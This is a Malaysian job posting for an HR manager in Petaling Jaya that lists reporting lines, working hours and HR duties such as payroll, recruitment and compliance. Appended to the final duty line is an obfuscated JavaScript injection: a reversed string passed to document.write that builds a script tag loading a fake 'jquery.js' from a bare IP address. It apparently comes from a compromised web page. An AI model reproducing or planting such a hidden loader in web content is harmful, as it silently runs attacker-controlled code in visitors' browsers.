Location: Petaling Jaya, Selangor
Reporting to : COO
Subordinates : 6-10 staffs
Workforce : 1600 +- (Included foreign workers)
Working day and hours : 5 days works (8:30am- 5:30pm)
Manage the spectrum of Human Resources functions by developing and delivery of HR strategies support in fueling company’s overall operational objectives and direction.
Duties & Responsibilities:
• Contributes at operational level in order to identify HR priorities and recommend appropriate people management solutions that support business aims.
• Provides customer focused HR support
• Provides advice and support to employees on all aspects of people management that reflects company’s direction and vision including on pertinent legislations and best practices.
• Managing talent and succession planning
• Taking charge of overall recruitment activities, including foreign working hiring and related staffing matters.
• Manages the payroll function for all employees of the company
• Arrange training for employees and conduct the new employee induction program for new hiring employees
• Controls HR operation expenses and check and verify of staff’s monthly personal claims.
• To prepare monthly reports & employee movement, any HR related letters
• To execute compensation and benefit administration (Performance management system)
• To compile the data and prepare the KPIs for individual department.
• Ensure compliance to all government statutory requirements.
• Compile data for budgeting and reporting purpose to the management.
• To ensure the HR policy is accordance to Employment Act and Labor Law.
• Report of new hires and resignations to insurance companies and panel clinics.
• To responsible in Employee Relations/ Welfare and to conduct Employee Engagement survey
• Undertake other special assignments or related duties specified by management from time to time document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))